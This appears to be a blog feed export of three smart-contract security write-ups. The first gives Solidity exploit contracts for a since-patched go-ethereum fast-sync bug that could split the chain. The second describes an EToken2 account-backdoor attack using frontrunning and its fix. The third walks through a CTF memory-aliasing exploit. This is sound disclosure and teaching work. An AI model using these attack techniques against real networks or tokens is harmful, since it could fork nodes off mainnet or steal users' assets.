<![CDATA[Booby Trapping the Ethereum Blockchain]]>https://samczsun.com/booby-trapping-the-ethereum-blockchain/60a80b1a2c41740001d6fc2fThu, 27 May 2021 22:54:20 GMT

This is the second in a series of blog posts about bugs I've found in go-ethereum (Geth). If you haven't already, take a look at Part 1 here.

Today's post is about a bug in Geth's state downloader which could be used to trick it into syncing with mainnet incorrectly. If exploited, an attacker could have booby trapped the Ethereum blockchain and triggered a hard fork at will.

Synchronization

Whenever someone wants to run an Ethereum node, they must first synchronize with the network. This means downloading or computing all of the data needed to build a complete picture of the chain state at the latest block. Depending on the needs of the user, some tradeoffs between security and speed can be made, so Geth supported (at the time) two different sync modes: full sync and fast sync.

As the name would suggest, full sync performs a full synchronization of the Ethereum blockchain. This means that Geth will download and validate the proof-of-work seals on every single block. Geth will also execute every single transaction in the block, which allows it to generate the blockchain state locally without needing to trust other nodes. This is more secure but comes with a heavy speed tradeoff, as a full Geth sync may take anywhere from days to weeks to complete.

However, some users may not want to wait weeks for a full sync to complete. Perhaps they have a deadline to meet or they simply don't think the speed tradeoff is worth it. For this, Geth offers a mode where chain data up to a recent block (known as the pivot) is synchronized using a faster approach, with only the few remaining blocks being synchronized using the slower full sync algorithm. In fast sync mode, Geth downloads but does not verify the proof-of-work on every block, instead choosing certain blocks at random. Geth also does not execute any transactions, instead choosing to download the state trie directly from peers in order to arrive at the final blockchain state.

Of course, Geth doesn't just blindly trust state trie data that peers send back, or a malicious peer could claim that a certain account has much more ether than it actually does. To understand how Geth can tell whether the data it just received is correct or not, we must first understand the Merkle-Patricia trie.

Merkle-Patricia Trie

The Merkle-Patricia trie (MPT) is a key data structure in Geth and is a combination of the Merkle tree and the Patricia trie.

Put very simply, a Patricia trie stores data in a tree-like structure based on the data's prefix. This is a more optimal way of storing similar data when compared to something like a hashmap, although there may be a speed tradeoff. For example, here's how several words all starting with r might be stored in a Patricia trie.

Booby Trapping the Ethereum Blockchain
By Claudio Rocchini - Own work, CC BY 2.5, https://commons.wikimedia.org/w/index.php?curid=2118795

Meanwhile, a Merkle tree is simply a tree where the leaf nodes are hashes of the data and all other nodes are hashes of their children. If a user knows the Merkle root (i.e. the top hash) of the Merkle tree and wants to check whether a specific piece of data was contained in the tree, they can do so using only a path through the tree, which is proportional to the log of the number of leaf nodes, rather than the number of leaf nodes itself. In the diagram below, a user can prove that L2 is a member of the tree by providing Hash 0-0 and Hash 1. The verifier will then generate Hash 0-1, Hash 0, and Top Hash which can be compared with the Merkle root they expected.

Booby Trapping the Ethereum Blockchain
By Azaghal - Own work, CC0, https://commons.wikimedia.org/w/index.php?curid=18157888

With a MPT, the prefix-based storage layout of the Patricia trie is combined with the Merkle tree to create a data structure whose contents can be cryptographically verified while still maintaining good runtime performance.

In the MPT, keys and values are arbitrary byte strings. To retrieve the value for a key, the key is first converted into a sequence of hexadecimal characters such that every byte becomes two hex characters. Then, the root node is consulted to determine what the next node should be for the first character in the sequence. The child node is then consulted for the second character, and the process repeats until the final node is found for the final character in the sequence.

In the example below, we see there are actually three different types of nodes in the MPT. An extension node (or, a short node, as it's referred to in the Geth codebase) is an optimization which states that the given node is responsible for multiple characters in the stream. In this case, the root node covers all keys which begin with a7, removing the need for two distinct nodes to represent a and 7. A branch node (or a full node) contains pointers for every possible character as well as one extra slot for the value at the current node. Finally, a leaf node (or a value node) indicates that the given node must match until the end of the key1.

Booby Trapping the Ethereum Blockchain
By Lee Thomas

State Trie

Now that we know how the Merkle-Patricia trie works, we can examine the global state trie itself.

The global state trie is where most of the data for the blockchain is stored. Although it's convenient to imagine the state trie as a distinct entity that is unique to each block, the reality is that duplicating the entire state trie for each block would be extremely inefficient as only a small percentage of the trie changes from block to block. Instead, Geth maintains what can be imagined like a pool of MPT nodes. The state trie for each block is simply a subset of the whole pool, and as new blocks are mined or imported, new MPT nodes are inserted into the pool.

In order to identify the root nodes in the pool of nodes, the block header must be consulted. Every block contains a field known as the stateRoot, which points to the root node of the MPT which stores account data keyed by the account address2. This allows Geth to look up account information such as the nonce or balance for any address using the algorithm we described above.

Booby Trapping the Ethereum Blockchain
Original by Lee Thomas

Note that for contracts, the account state will contain a non-empty storageRoot and codeHash. The storageRoot points to another root node, but this time for a MPT which stores contract storage data. This MPT is keyed on the storage slot and the value is the raw data itself.

Booby Trapping the Ethereum Blockchain
Original by Lee Thomas

To store the MPT on disk, Geth chose to use LevelDB as its database. However, LevelDB is a key-value datastore that only supports string-to-string mappings, and a MPT is not a string-to-string mapping. To solve this problem, Geth flattens the global state trie by writing each node as a key-value pair: the key is the hash of the node and the value is the serialized node itself. This is also how Geth is able to look up the state trie for any given block, because the stateRoot field in the block header is the key which can be used to find the serialized MPT node in LevelDB.

Trie Confusion

So let's say that you're starting up a Geth node and you're connecting to the network using fast sync. Geth will quickly download all of the block data but not execute any transactions. Before long, you'll have a chain of blocks but no state information. Here, Geth kicks off the state downloader which begins synchronizing from the pivot block's stateRoot.

// NewSync creates a new trie data download scheduler.
func NewSync(root common.Hash, database ethdb.KeyValueReader, callback LeafCallback, bloom *SyncBloom) *Sync {
	ts := &Sync{
		database: database,
		membatch: newSyncMemBatch(),
		requests: make(map[common.Hash]*request),
		queue:    prque.New(nil),
		bloom:    bloom,
	}
	ts.AddSubTrie(root, 0, common.Hash{}, callback)
	return ts
}
Source

The state downloader will send a request to its peers for the MPT node data corresponding to the MPT node key. When it receives a result, it verifies that the node data hashes to the expected node key. If it does, then the state downloader knows that the node is correct and will process it by dispatching more requests for each child of the node.

		// Create and schedule a request for all the children nodes
		requests, err := s.children(request, node)
		if err != nil {
			return committed, i, err
		}
		if len(requests) == 0 && request.deps == 0 {
			s.commit(request)
			committed = true
			continue
		}
		request.deps += len(requests)
		for _, child := range requests {
			s.schedule(child)
		}
Source

If a leaf node is encountered, that is, a node which contains a serialized account state, then the account's code and state trie will be queued for fetching.

	callback := func(leaf []byte, parent common.Hash) error {
		var obj Account
		if err := rlp.Decode(bytes.NewReader(leaf), &obj); err != nil {
			return err
		}
		syncer.AddSubTrie(obj.Root, 64, parent, nil)
		syncer.AddRawEntry(common.BytesToHash(obj.CodeHash), 64, parent)
		return nil
	}
Source

Note that there's a distinction between synchronizing a sub trie and a raw entry. While both will download an arbitrary blob of data, if the syncer is expecting a raw trie then it will parse the data as a trie node and begin synchronizing its children. On the other hand, if the syncer is expecting a raw entry it will simply write the blob to the database and terminate.

		// If the item was not requested, bail out
		request := s.requests[item.Hash]
		if request == nil {
			return committed, i, ErrNotRequested
		}
		if request.data != nil {
			return committed, i, ErrAlreadyProcessed
		}
		// If the item is a raw entry request, commit directly
		if request.raw {
			request.data = item.Data
			s.commit(request)
			committed = true
			continue
		}
Source

Additionally, note that it's not uncommon for Geth to want to request the same node multiple times. For example, two contracts might share the same stateRoot if they contain identical storage, or two accounts might share the same account state. In this case, Geth doesn't want to spam the network with spurious requests so it will merge them together.

func (s *Sync) schedule(req *request) {
	// If we're already requesting this node, add a new reference and stop
	if old, ok := s.requests[req.hash]; ok {
		old.parents = append(old.parents, req.parents...)
		return
	}
	// Schedule the request for future retrieval
	s.queue.Push(req.hash, int64(req.depth))
	s.requests[req.hash] = req
}
Source

However, the syncer doesn't merge the raw attribute of a request. This means that if there is already a pending raw entry request but the syncer schedules a sub trie request with the same hash, it will be merged and the end result will still be a raw entry request.

Remember that a raw request does not process the node for children to be synced. This means that if we can somehow generate a collision between a raw node and a sub trie node, we'll be able to cause Geth to sync an incomplete state trie. Furthermore, Geth (at the time) doesn't bail out when reading from a trie node that doesn't exist, likely assuming that such a situation could never happen if the downloader reported a successful sync, meaning that a Geth node with a missing trie node would behave completely differently from any other node with a fully synchronized trie.

So how can we generate such a collision? It turns out to be extremely simple: all we need to do is deploy a contract whose code is equal to the serialized state root of another contract we control. Our code hash will necessarily be the same as the state root hash, which means that if our contract code is synchronized first, our other contract's state trie will never be fully downloaded.

Putting it all Together

Fully weaponizing this vulnerability would have required multiple steps and a lot of waiting.

First, we deploy a contract whose state trie will be overwritten using the exploit. This contract should have a unique stateRoot so that the MPT node associated with that stateRoot won't be synchronized earlier.

contract Discrepancy {
    uint public magic = 1;
    
    // make sure we have a unique stateRoot
    uint[] private filler = [1,2,3,4,5,6,7,8,9,0];
}

Next, we deploy another contract which will use the discrepancy to trigger a hard fork:

contract Hardfork {
    function hardfork(Discrepancy target) public {
        require(target.magic() == 0, "no discrepancy found");
        
        selfdestruct(msg.sender);
    }
}

Finally, we deploy a third contract whose code will be equivalent to the state root of our Discrepancy contract. We must take care here to ensure that the address of this contract is "smaller" than the address of the discrepancy contract itself so that it will always be synced before the discrepancy contract.

contract Exploit {
    constructor(bytes memory stateRoot) public {
        assembly {
            return(add(stateRoot, 0x20), mload(stateRoot))
        }
    }
}

Now we sit back and relax. As new Geth nodes join the network using fast sync, they will request the Exploit contract first which will sync its state sub trie as well as its code. When Exploit's code is synced, it will create a raw request which looks exactly identical to a request for Discrepancy's state root, except it won't be processed as a sub trie request. This means that the node will never download Discrepancy's state trie so future requests to read magic will return 0 instead of 1.

After sufficient time has passed, all we need to do is call Hardfork.hardfork(discrepancy). Every node which has correctly synchronized the entire network will see a reverted transaction, while every Geth node which had joined the network using fast sync will see a successful transaction. This will result in two different state roots for that block, meaning that we just triggered a chain split at will.

The Geth team quickly patched this attack by properly handling trie read errors in PR #21039, then fully fixed the vulnerability by distinguishing between code blobs and trie blobs in PR #21080.

Conclusion

This was an extremely interesting bug which gave an attacker the ability to set a booby trap on the Ethereum network and detonate it whenever they liked, causing all fast-synced Geth nodes to fork off mainnet. It relied on extremely complex internal logic within Geth's synchronization and data storage code, which may explain why it went unnoticed for so long.

Tune in later for the third and final (for now, at least) installment in this series, where we'll be exploring a bug in Geth that's so new, the details are still embargoed at the time of writing.


1 Technically, value nodes in Geth don't contain a suffix. Instead, you can think of it like an extension node followed by a value node (which just contains the raw data).

2 In reality Geth uses what it calls a "secure trie" which just hashes all keys using the SHA-3 algorithm in order to ensure all keys are always a fixed length.

]]>
<![CDATA[Uncovering a Four Year Old Bug]]>https://samczsun.com/uncovering-a-four-year-old-bug/6069538c8b092400019ea099Mon, 19 Apr 2021 18:39:44 GMT

Every adventure requires a first step - The Cheshire Cat

What does it take to find a bug? What about one in a contract that's survived the test of time? The journey to a critical vulnerability isn't always straightforward and might begin when you least expect it.

A few weeks ago I tweeted about a critical bug I had found. The bug affected contracts that are over four years old and now manage over a billion dollars in assets. Today, I'll tell you the story of how it happened.

The White Rabbit

It was just after lunch when I got a push notification from one of the Ethereum security group chats.

Uncovering a Four Year Old Bug

This immediately caught my attention for two reasons:

  1. Most users of go-ethereum (geth) will normally never run into an error, because the software is written to be extremely resilient
  2. This error was occurring on the latest version of geth, meaning it had all the newest security patches

Having just found a bug in geth myself recently, I couldn't help wonder if there was an ongoing attack.

Uncovering a Four Year Old Bug

Anatol confirmed that the block was indeed on mainnet and shared his log file to help with debugging.

########## BAD BLOCK #########
Chain config: {ChainID: 1 Homestead: 1150000 DAO: 1920000 DAOSupport: true EIP150: 2463000 EIP155: 2675000 EIP158: 2675000 Byzantium: 4370000 Constantinople: 7280000 Petersburg: 7280000 Istanbul: 9069000, Muir Glacier: 9200000, YOLO v2: <nil>, Engine: ethash}

Number: 11805072
Hash: 0x0b3d0081b32c2159e2b77e5f2c798b737d0ae1a822669614c989377947c71ada
     0: cumulative: 123312 gas: 123312 contract: 0x0000000000000000000000000000000000000000 status: 1 tx: 0x9bdf8792e0d6b62a68b9dbd849d60ca78ae6512d9a838d575d4f51d36a7ae095 logs: [0xc12c5d6000 0xc12c5d60b0 0xc12c5d6160 0xc12c5d6210 0xc12c5d62c0] bloom: 00200000000000040000000080000000000000000000001000010001000000000000000000000000000000000000000002000000080800000000000000000000000000000000000000000008000000200000000000000000000000008000010000000000000000000000000000000010000000000000000000000010000000000000000000000000004000000000000000000001000000080000004000000000000000000000000000000000000000000000000000000000000000000000000000008002000082000000000040000000000000000000001002000000000020000000200000000000000000000000000000000000000000400080000000000000 state: 
     [snip]
     203: cumulative: 11152534 gas: 45752 contract: 0x0000000000000000000000000000000000000000 status: 1 tx: 0x63fe497529605f75abdaa5b026ef5e6d878fca827a7ee2a3168d9c4f0347baef logs: [0xc127c05970] bloom: 00000000000000000000000000000000000000000800000000010000000000000000000000000000000000000000000000000800000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000034000000000000000000000000000000000000000000000000000000000000 state: 


Error: invalid gas used (remote: 12458355 local: 11152534)
##############################

This error says that the block header claimed that all of the transactions used a total of 12458355 gas, but when the node executed all of the transactions it only used 11152534 gas instead. I first double-checked that my own node knew of the suspicious block.

$ seth block 11805072 hash
0x0b3d0081b32c2159e2b77e5f2c798b737d0ae1a822669614c989377947c71ada

Given that the block hash matched, I knew that this wasn't an exploit but rather some sort of error with Anatol's node. The error log tells us the gas used by each transaction, so I quickly wrote a script to check each transaction in the block and compare the actual gas used with what Anatol's node reported. This let me pinpoint the offending transaction.

Uncovering a Four Year Old Bug

I knew that there must be some difference in state between Anatol's node and mainnet, so I DMed him for RPC access so I can inspect the contracts that the offending transaction interacted with.

Uncovering a Four Year Old Bug

The transaction in question was a simple ERC20 transfer, so I quickly simulated it on Anatol's node, which failed.

Uncovering a Four Year Old Bug

I quickly confirmed that the sending account contained enough tokens so all that was left was to comb through each sub-call to see where the gas usage discrepancy came from. After wrangling with seth for a bit, I found the root cause.

Uncovering a Four Year Old Bug

This contract contains an address in storage slot 0 on mainnet but no address on Anatol's node, a clear indication that there was some storage corruption. Anatol revealed that he actually restored the geth database from a backup, so most likely something got lost along the way and the node couldn't read the storage entry for that specific contract. Given that it'd be practically impossible to figure out what else was corrupted, I recommend he give snap sync a shot to quickly get his node back up and running.

Uncovering a Four Year Old Bug

Down the Rabbit Hole

Now that the immediate mystery was solved, I turned my attention to the corrupted contract. While debugging the transaction, I recognized the contract as an EToken2-issued token. I had reviewed that particular platform a long time ago, but that was before I gained all the experience I have now. Sometimes all it takes was a fresh approach and I was feeling confident that things would be different this time.

I started by defining my goals. Since this was an ERC20 contract, any way to get free tokens (either through stealing them from others or minting them myself) would have the highest impact. Next would be any form of griefing such as burning tokens that I don't own or making it impossible to transfer tokens.

Now I could start reviewing. The token contract itself delegates the ERC20 functions such as transfer to an implementation contract, but interestingly the implementation may vary per-user. Essentially, the token contains a default implementation (the latest version) which can be upgraded at any time by the owner. If a user doesn't agree with the upgrade, they can choose to opt-out and fix their specific implementation to the current version instead of being dragged along to the new implementation. This was an extremely interesting mechanic but I quickly confirmed that there was no way for me to set a custom implementation for myself, so I moved on.

Next up was the default implementation contract. Because the token wasn't using delegatecall but rather call, it needed to tell the implementation who the original caller was. If the implementation wasn't correctly authenticating the proxy, then it would be possible to spoof a transfer. Unfortunately, a quick check revealed that the implementation contract was secure as well.

After one more hop through the main token contract I finally arrived at the EToken2 platform contract, which is where all of the ERC20 logic is truly implemented. If the previous contracts were the appetizers, then this would be the main course, and I was excited to dig in.

Cake and a Drink

Earlier I had noticed that in order to be ERC20-compliant, each token contained two functions which emitted Transfer and Approval functions which could only be called by the EToken2 contract. It would be extremely interesting if I could somehow trick the EToken2 contract into emitting fake events, so I focused on this first.

There was only one place in the EToken2 contract which triggered a token to emit the event, and that was in _proxyTransferEvent.

function _proxyTransferEvent(uint _fromId, uint _toId, uint _value, bytes32 _symbol) internal {
    if (proxies[_symbol] != 0x0) {
        // Internal Out Of Gas/Throw: revert this transaction too;
        // Recursive Call: safe, all changes already made.
        Proxy(proxies[_symbol]).emitTransfer(_address(_fromId), _address(_toId), _value);
    }
}

Interestingly though, the function didn't take the proxy directly but the symbol indirectly. This was a classic example of an indirection attack because if I could change the value of proxies[_symbol] then I would be able to trigger a Transfer event on any target I wanted.

There were three calls to _proxyTransferEvent: minting would trigger an event from address(0) to msg.sender, burning would trigger an event from from  to address(0), and transferring would trigger an event from from to to. The first two were not particularly useful because I could only control at most one of the two parameters, but the last was interesting because I could potentially trigger a Transfer event from an arbitrary address to an arbitrary address.

Unfortunately, here I ran into a problem. The only way to reach the _transfer function was through the proxyTransferFromWithReference function, and that function would only allow the address specified in proxies to trigger a transfer for the specific symbol. This meant that if I owned a token and updated my proxy to the proxy for another token, I would no longer be able to trigger the transfer to cause the exploit.

It seemed like this potential exploit was dead, but I was reluctant to give up on it so I scrolled around some more. It was then that I really looked closer at the function signature for _transfer.

function _transfer(
    uint _fromId,
    uint _toId,
    uint _value,
    bytes32 _symbol,
    string _reference,
    uint _senderId
) internal checkSigned(_senderId, 1) returns (bool);

I had completely dismissed the checkSigned modifier because it was obviously a no-op in the default configuration. If it was significant, then users would have to submit some sort of signature with each transfer and that was obviously not happening. Now, with nowhere else to turn, I decided to look into what exactly checkSigned was doing.

    function _checkSigned(Cosigner _cosigner, uint _holderId, uint _required) internal returns(bool) {
        return _cosigner.consumeOperation(sha3(msg.data, _holderId), _required);
    }

    modifier checkSigned(uint _holderId, uint _required) {
        if (!isCosignerSet(_holderId) || _checkSigned(holders[_holderId].cosigner, _holderId, _required)) {
            _;
        } else {
            _error('Cosigner: access denied');
        }
    }

Incredible! It turns out that checkSigned actually performed an external call if a Cosigner is set for a user. This would explain why I never saw any users providing any signatures for a simple transfer. At the same time, this security feature was exactly what I needed to finalize my exploit.

I've talked about how reentrancy is really just a subset of what I've dubbed unsafe external calls, because the real risk is in the fact that control flow is handed to a third-party contract which can then go and do whatever it wants. The attacker could choose to reenter through the same function, but they could just as well do anything else, and this is a great example of that.

The problem I was facing was that I needed proxies[symbol] to be my own proxy before the transfer call, but a different value after I had begun the transfer process. Now with the cosigner functionality, I could set a custom cosigner which would swap my symbol's proxy when it receives a call to consumeOperation. This call would happen after the call to proxyTransferFromWithReference but before the call to _proxyTransferEvent, allowing me to trigger an arbitrary event on any EToken2-issued token!

Pepper

This was a good start, but the impact was not quite what I was looking for. This was because EToken2 is a whitelisted platform and only a centralized authority could issue new tokens. If I were an attacker and I wanted to pull off this attack, I would have to sign up and probably go through KYC/AML, which is obviously not ideal. It was also unclear who exactly might be affected by this bug, and I couldn't really go and test it for myself.

Undeterred, I stowed this finding away and kept looking for something else. While scanning through the contract, I noticed some interesting logic for transferring access from one user to another.

    function grantAccess(address _from, address _to) returns(bool) {
        if (!isCosignerSet(getHolderId(_from))) {
            _error('Cosigner not set');
            return false;
        }
        return _grantAccess(getHolderId(_from), _to);
    }

    function _grantAccess(uint _fromId, address _to) internal checkSigned(_fromId, 2) returns(bool) {
        // Should recover to previously unused address.
        if (getHolderId(_to) != 0) {
            _error('Should recover to new address');
            return false;
        }
        // We take current holder address because it might not equal _from.
        // It is possible to recover from any old holder address, but event should have the current one.
        address from = holders[_fromId].addr;
        holders[_fromId].addr = _to;
        holderIndex[_to] = _fromId;
        // Internal Out Of Gas/Throw: revert this transaction too;
        // Recursive Call: safe, all changes already made.
        eventsHistory.emitRecovery(from, _to, msg.sender);
        return true;
    }

As it happens, I was so engrossed in figuring out how exactly to swap around the proxy that I didn't pay attention to what was actually going on in the contract. Notice that in the signature for _transfer, the from and to values are actually uint, not address. The EToken2 contract maintains a mapping of users (address) to holder id (uint) and this was the logic for granting your holder id to another address.

The moment I realized this, I started studying this function in earnest. At a high level, this function essentially transferred ownership of some data from one entity to another, and one common mistake to make when implementing this sort of internal ownership transfer is to update the receiver correctly but forget to invalidate the sender. If the receiver isn't updated correctly, any sort of testing will instantly reveal that there's a problem. If the sender isn't invalidated correctly, simple tests might not notice anything wrong.

Looking closer at the implementation of _grantAccess, I saw that it was intentionally designed such that it's possible to determine the previous address that owned a specific holder id. This was intended to allow a user who accidentally granted access to the wrong wallet to still maintain ownership, but intuitively I knew something was off here.

Even still, I couldn't quite figure out what that was at first glance. After all, if an attacker were to grant access to their holder id to another user, that's just putting their own funds at risk. Why would anyone want to do that?

After stewing on it for a little bit, I realized that I was looking at it in the wrong way. The key was that while the other user would have full ownership over "my" holder id, I would also have full ownership over "their" holder id. In other words, I would be able to backdoor any new user of the EToken2 platform and gain full access to their account, which translates to control over any EToken2-issued token they owned.

It was a quick step from there to figure out how to weaponize this exploit. I needed to grant access to a user before they first use the EToken2 platform, but I can't just go around granting access to random addresses. The solution was clear - I could just scan the mempool for transactions which would result in a user becoming registered with the EToken2 platform, and then frontrun any transactions I find. What's more, because of EToken2's architecture, I wouldn't just be attacking a single token but multiple tokens with multi-million dollar market caps.

At this point, I knew I had found what I was looking for, and it was time to contact the project.

52

Finding the bug was one thing, but fixing it was another. EToken2 had been designed to be non-upgradable, but forcing every single token issued on top of EToken2 to migrate their data to a new contract would be unduly burdensome. Oleksii, fellow white hat and also the head architect at Ambisafe, agreed. We had to find another way.

There weren't many things in _grantAccess that could revert. In fact, there was only one. The very last line in the function logged an event using the eventHistory contract. If this call reverted, then so would the call to _grantAccess and it would be impossible for anyone to backdoor another account. However, the EventsHistory contract doesn't allow administrators to redefine the handler for an event.

    function addVersion(address _caller, string _name, string _changelog) noValue() checkAccess("admin") returns(bool) {
        if (versions[_caller] != 0) {
            return false;
        }
        if (bytes(_name).length == 0) {
            return false;
        }
        if (bytes(_changelog).length == 0) {
            return false;
        }
        uint version = ++latestVersion;
        versions[_caller] = version;
        versionInfo[version] = VersionInfo(block.number, msg.sender, _caller, _name, _changelog);
        return true;
    }

    function () noValue() {
        if (versions[msg.sender] == 0) {
            return;
        }
        // Internal Out Of Gas/Throw: revert this transaction too;
        // Call Stack Depth Limit reached: revert this transaction too;
        // Recursive Call: safe, all changes already made.
        if (!emitters[msg.sig].delegatecall(msg.data)) {
            throw;
        }
    }

It seemed like we were at a dead end, but we quickly realized the situation wasn't nearly as bad as it appeared. Although the EventsHistory contract was intended to be immutable, it too had a bug which could be "exploited" by the admins.

Each emitter was handled using a delegatecall, which causes the code to be executed with the current contract's context. If we wanted to perform an upgrade on the EventsHistory contract, we could just register a fake emitter which would perform the upgrades we wanted by directly writing to storage.

Oleksii quickly wrote a few contracts to patch up the vulnerabilities I had found. The first would replace the handler for the emitRecovery function and would require that any addresses being granted access had explicitly opted in to being granted access. The second would replace the handler for all ERC20-related events and would require that the proxy contract for a given symbol was the expected proxy. The third would perform the upgrade on the EventsHistory contract by replacing the handlers and then forever disable the ability to register new emitters, making the contract truly immutable.

On April 6th, a mere 4 days after I had taken that first step, the upgrades were deployed and this saga was forever immortalized on the blockchain.

Uncovering a Four Year Old Bug

Special thanks to Anatol for the very special role he played in this and Oleksii for sacrificing his weekend in order to resolve this with me.

]]>
<![CDATA[Paradigm CTF 2021 - swap]]>https://samczsun.com/paradigm-ctf-2021-swap/606dfaa58b092400019ea0b3Fri, 09 Apr 2021 17:17:56 GMT

When you have eliminated all which is impossible, then whatever remains, however improbable, must be the truth - Sherlock Holmes

Paradigm CTF 2021 took place in early February and together, players solved all but two of the challenges during the competition (and one of the remaining two mere days later).

However, the second of the two remained unsolved for almost 2 months until just a few days ago.

Today, we'll be taking a look at swap in the form of a guided walkthrough. Each section will give you a small hint at the end in case you're stuck. If you haven't already, take a look at the challenge files here and familiarize yourself with the code.

The Challenge

This challenge implements a fictional stablecoin AMM. Users can do all the things you'd expect from an AMM:  swap assets and mint/burn/transfer LP shares. The contract is initialized with 100 ether worth of four stablecoins (DAI, TUSD, USDC, USDT) and the win condition is to reduce the TVL of the AMM to 1% of what it started with.

Initially, you might assume that there's a bug in the swap function, but it's easy to confirm with reasonable confidence that the function behaves as expected and won't give you any free stablecoins.

You might also try stealing the LP tokens from the setup contract itself, but the ERC20 implementation appears to be correct and so that's impossible too.

You could try minting and burning LP tokens, but you'll find that the invariants appear to be correctly maintained and that you can't mint more LP tokens than you deserve, or burn more LP tokens that you have.

Finally, just to really drive the point home, all functions are marked nonReentrant.

At this point, the challenge is looking pretty hopeless so under contest conditions it's perfectly reasonable to just drop it and move onto a different problem. However, now that we have all the time in the world, how might we tackle this?

Well, keen observers might notice that the win condition is slightly different in this challenge. In every other challenge, it's always required to drain the entire contract of all assets. However, in this challenge, you only need to drain a percentage. Why might this be?

Everything Is Intentional

One of the lessons I've learned the hard way is that everything in a CTF, no matter how innocuous, is intentional. In this sense, the win condition is a subtle hint towards what the solution requires. The fact that you don't need to drain all of the assets to win should strongly suggest that it's in fact impossible to drain all of the assets.

But what does this mean for us? Working from first principles, we can reset our assumptions by following this chain of logic:

  1. We need to remove (some, but not all) assets from the pool
  2. The only way for assets to leave the pool is through a swap or a burn
  3. Swapping appears to be correctly implemented such that no assets can be stolen
  4. Burning also appears to be correctly implemented such that no assets can be stolen
  5. However, while swapping is a single-step process, burning is a two-step process where the first step is somehow acquiring LP tokens. The burn operation itself says nothing about where the LP tokens come from, so there must be a way to get free LP tokens

The subtle hint also reinforces this theory. Assuming that we can't steal the LP tokens from the setup contract, we'll never be able to burn 100% of all LP tokens and so we'll never be able to drain the entire contract.

Under the assumption that there must be a way to get free LP tokens, can you figure out what the solution is?

No Matter How Improbable

There are only two ways to get LP tokens. The first is to mint them, and the second is to be transferred them. We've already established that the ERC20 implementation is sound (although you may want to double-check that before committing yourself to the more challenging route) which leaves us with the mint function.

     struct MintVars {
        uint totalSupply;
        uint totalBalanceNorm;
        uint totalInNorm;
        uint amountToMint;
        
        ERC20Like token;
        uint has;
        uint preBalance;
        uint postBalance;
        uint deposited;
    }
 
    function mint(uint[] memory amounts) public nonReentrant returns (uint) {
        MintVars memory v;
        v.totalSupply = supply;
        
        for (uint i = 0; i < underlying.length; i++) {
            v.token = underlying[i];
            
            v.preBalance = v.token.balanceOf(address(this));
            
            v.has = v.token.balanceOf(msg.sender);
            if (amounts[i] > v.has) amounts[i] = v.has;
            
            v.token.transferFrom(msg.sender, address(this), amounts[i]);
            
            v.postBalance = v.token.balanceOf(address(this));
            
            v.deposited = v.postBalance - v.preBalance;

            v.totalBalanceNorm += scaleFrom(v.token, v.preBalance);
            v.totalInNorm += scaleFrom(v.token, v.deposited);
        }
        
        if (v.totalSupply == 0) {
            v.amountToMint = v.totalInNorm;
        } else {
            v.amountToMint = v.totalInNorm * v.totalSupply / v.totalBalanceNorm;
        }
        
        supply += v.amountToMint;
        balances[msg.sender] += v.amountToMint;
        
        return v.amountToMint;
    }

The goal now is to somehow adjust v.amountToMint such that we are minted way more LP tokens than we deserve. We can start by reviewing the function itself again, but this time with a fine-tooth comb. The function begins by constructing an object to represent the local variables. Then, for each token, we record the current balance of the AMM as well as the balance of the sender. If the amount to be deposited is greater than the sender's balance, then we update the amount requested. We perform the transfer, record the current balance again, then update the total deposited counters appropriately.

Nothing is immediately obvious, so we must begin eliminating the impossible and leave ourselves with only the improbable. Unfortunately, sometimes we might not know enough to immediately differentiate between the impossible and the improbable, so we'll need to keep an open mind.

We can again reset our assumptions by working from first principles using the following chain of logic:

  1. We clearly need to change v.amountToMint in such a way that the value is larger than what it should be
  2. The equation to calculate the amount to mint is implemented correctly
  3. Therefore, there must be another way to either tamper with v.amountToMint directly or to tamper with one of the values it depends on.

Do you see any way to do this, even if it seems impossible or improbable at first?

True Names Have Power

Notice that v.amountToMint is a field on MintVars memory v. This means that any time we write to v.amountToMint, we're actually writing to memory. Unlike data on the stack (recall that the EVM is a stack-based VM), data in memory can be aliased, meaning that the same data can be accessed through multiple symbolic names.

It just so happens that we have two pointers to memory in scope. The first is MintVars memory v, and the second is uint[] memory amounts. If we could somehow cause the latter to point to the same memory address as the former, then we could trigger undefined behavior by updating one through the other.

In order to understand where the amounts variable comes from, we'll first take a brief detour to the land of the Solidity ABI. All transactions are but blobs of data, and it's the job of the ABI to define a standard way of parsing that blob into structed information. Before a contract's code is executed, Solidity inserts some logic which decodes the transaction data into the types that the code expects. Only then does the contract begin executing.

In the case of mint(uint256[]), the ABI decoder will decode the transaction data into a single array of uint256. Is there some way that we can trick the ABI decoder into causing the decoded array to alias with the MintVars object constructed later?

Around the World

According to the Solidity documentation, the ABI encoding of an array is as follows:

<- 32 bytes ->

OOOOO....OOOOO [offset to array start]
    [....]
LLLLL....LLLLL [length in words]
DDDDD....DDDDD [data #1]
DDDDD....DDDDD [data #2]
    [....]
DDDDD....DDDDD [data #L]

To parse that data, the ABI decoder runs the following pseudocode:

function decodeArrayAt(uint arg) private returns (bytes memory) {
    uint offset = read(0x04+0x20*arg);
    uint length = read(0x04+offset);
    bytes memory data = malloc(length);
    memcpy(data, 0x04 + offset + 0x20, length);
    return data;
}

So far so good. Let's take a look at how malloc is implemented, again in pseudocode:

function malloc(uint size) private returns (bytes memory) {
    bytes memory buf;
    assembly {
        buf := mload(0x40)
        mstore(0x40, add(add(buf, size), 0x20))
        mstore(buf, size)
    }
    return buf;
}

Solidity uses what is known as a linear memory allocator (or arena-based allocator). This just means that Solidity will allocate new memory linearly along the block of total available memory. To allocate a new chunk, Solidity reads the free-memory pointer stored at 0x40 to determine where the next free address is, and moves it forward to reflect the fact that a new chunk of memory was just allocated.

Notice that there are no checks to ensure that the amount of memory requested is not excessively large. This means that if one was to allocate a specific amount of memory, then the free memory pointer may overflow and begin re-allocating in-use memory. In this case, two calls to the pseudo-malloc might return pointers which alias each other.

Fortunately for us, we can control exactly the size of memory the allocator will allocate simply by changing the ABI-encoded representation of our array. This lets us cause the allocator to allocate v over top of our amounts array.

Can you figure out the final step to solving this challenge?

Technical Difficulties

Because v and amounts now alias each other, both will share the same values and updating one will update the other. This means that while you can manipulate v by writing into amounts, the reverse is true as well.

As such, if you just tried to force some initial values into v by calling mint with some custom values, you might've found that your data kept getting clobbered by the writes to v.totalSupply, v.totalBalanceNorm, and v.totalInNorm. This means that some careful planning is needed to make sure that your values stay consistent over all four iterations of the loop.

